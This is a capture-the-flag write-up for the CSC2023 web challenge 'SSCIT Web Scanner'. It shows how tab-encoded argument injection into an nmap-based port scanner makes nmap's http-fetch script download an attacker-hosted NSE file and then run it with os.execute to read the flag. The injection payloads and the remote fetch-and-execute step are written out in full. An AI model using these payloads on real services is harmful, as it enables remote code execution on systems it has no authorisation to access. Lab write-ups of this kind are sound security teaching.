CSC2023 - [Web] - SSCIT Web Scanner

You,CSC2023Web
Back

Challenge Description

It's just an application to scan your ip with port. What can possibly go wrong

Solution

On giving ip and port it scans it using nmap

Alt text

In nmap there is nmap script engine which we can use to run nmap scripts

Go to this site (opens in a new tab)

Argument Injection

Using nse scripts we can upload our payload to the server and after that run it

First I would create a file which would contain following content

os.execute('cat /flag-*')

I named it payload.nse

Run the http server using following command

python3 -m http.server 8899

Payload 1

service=172.17.0.1:8899%09--script%09http-fetch%09--script-args%09http-fetch.destination=/tmp,http-fetch.url=/payload.nse

Alt text Getting requests on http server Alt text

Payload 2

service=172.17.0.1:8899%09--script%09/tmp/172.17.0.1/8899/payload.nse

Alt text

Flag

CSC{Inj3ct10ns_4re_s0_b4d}

Writeups 2023 © RootxRAN.